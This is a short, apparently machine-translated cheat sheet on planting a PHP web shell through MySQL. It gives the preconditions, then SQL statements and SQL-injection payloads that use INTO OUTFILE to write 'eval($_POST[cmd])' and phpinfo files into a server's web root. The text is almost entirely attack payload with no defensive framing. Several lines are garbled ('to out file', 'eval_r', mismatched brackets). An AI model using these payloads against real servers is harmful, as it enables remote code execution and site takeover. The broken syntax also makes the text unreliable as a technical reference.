MySQL Write shell

The following conditions need to be met:

1. Root Permissions
2. GPC off (can use single quotes)
3. have absolute path (read file can not, write file must)
4. No configuration –secure-file-priv

Drop TABLE IF EXISTS temp; Delete if temp is present
Create TABLE Temp (cmd text not NULL); Create a temp table with a CMD field inside it
Insert into temp (cmd) VALUES (' <? php eval_r ($_post[cmd));? > '); Insert a word trojan into the temp table
Select cmd from temp to out file ' f:/wwwroot/eval.php '; Query a sentence in the Temp table and import the results into eval.php
Drop TABLE IF EXISTS temp; Delete Temp



UNION Select 1,2,3,4,5,6,7,8,9,10,11,12union Select, ' Zerosoul ', 4,5,6,7,8,9,10,11,12/*, The Zerosoul is displayed where the page last displayed 3.
That is, if our SELECT statement is not followed by a from table statement, we say that the queried number or character is returned directly to the query results.

1. Union Write Shell
id=2) union Select 1,2,3,4,5,6,7, ' <? Phpinfo ();?> ' into outfile '/home/wwwroot/lu4n.com/luan_phpinfo.php '

2. No union

id=2) into outfile '/home/wwwroot/lu4n.com/luan_phpinfo.php ' fields terminated by ' <? Phpinfo ();?> '

such as SELECT * from users to outfile ' C:\1.txt ' fields terminated by "<? Phpinfo ();?> "

With this idea, the above large paragraph to a sentence of the SQL code can be directly simplified to a sentence:

Select ' <? PHP eval_r ($_post[cmd]);? > ' into outfile ' f:/wwwroot/eval.php ';

MySQL Write shell